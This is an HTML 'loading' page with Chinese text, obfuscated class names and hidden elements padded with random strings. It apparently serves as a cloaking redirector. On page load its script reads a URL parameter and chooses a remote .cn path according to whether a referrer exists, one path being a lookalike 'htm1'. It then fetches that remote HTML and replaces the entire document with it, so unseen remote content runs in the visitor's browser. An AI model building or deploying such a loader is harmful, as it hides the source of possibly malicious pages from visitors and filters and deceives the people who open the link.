<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .a4Pae6gQgfu {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .a4Pae6gQgfu .OlCE7TIb {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .a4Pae6gQgfu .content {
            line-height: 50px;
            text-align: center
        }

        .a4Pae6gQgfu .img {
            width: 100%
        }

        .a4Pae6gQgfu .YPA9ItcC {
            text-align: center
        }

        .a4Pae6gQgfu .YPA9ItcC span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .a4Pae6gQgfu .YPA9ItcC span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .a4Pae6gQgfu .YPA9ItcC span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .a4Pae6gQgfu .YPA9ItcC span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .a4Pae6gQgfu .YPA9ItcC span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .a4Pae6gQgfu .YPA9ItcC span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .a4Pae6gQgfu .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function huqfhOt9p13y(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Pliektc = huqfhOt9p13y('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Pliektc +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Pliektc +".html?a=share";
		}
		
        fyWrq25o6=url+"#"+new Date().getTime();
        fyWrq25o6 && function() {
            $.get(fyWrq25o6, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>wrGCNBUoUx3XkzA43UeRALxh2qw4ZaIdvt2leO7l4t6fhIIEGZHiIpK1s5hEawX2ZYxNzOe97kfEYpr</div>
<img  src='' style='display:none'>
<span style='display:none'>qlGxsKholve1Ebt8hqxB83So7daY</span>
<div style='display:none'>wrGCNBUoUx3XkzA43UeRALxh2qw4ZaIdvt2leO7l4t6fhIIEGZHiIpK1s5hEawX2ZYxNzOe97kfEYpr</div>
<img  src='' style='display:none'>
<h1 style='display:none' >b9umBTaPF2P3wl7uloLDQkmGEWM9D6LPR60M5AzJAbChyQps1zt1Z8vNfx5FVtZLvAwFuQj5Cnlq</h1>
<p  style='display:none'>lt88ULLrCrONBt</p><div class="a4Pae6gQgfu">
    <div class="OlCE7TIb">
        <div class="YPA9ItcC">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>WwtBLLiJgx4JPpKVXLHy</a>
<div style='display:none'>c4JXijLES05yr3PlphAspR6Dxfb57wrIDLyshsCv3PbPd2C5wnIDZAOFrKHBuZHidnovSRPk2eqGWZ72YXgltHWvTplT</div>
<b style='display:none' >Sy8QiYYtFWeXRbiD6x7IzmVhrl5hl8rzJU7V0EWeiKb2OR1ne</b>
<h1 style='display:none' >oqR7zMWHODH</h1>
<h1 style='display:none' >oqR7zMWHODH</h1></body>
</html>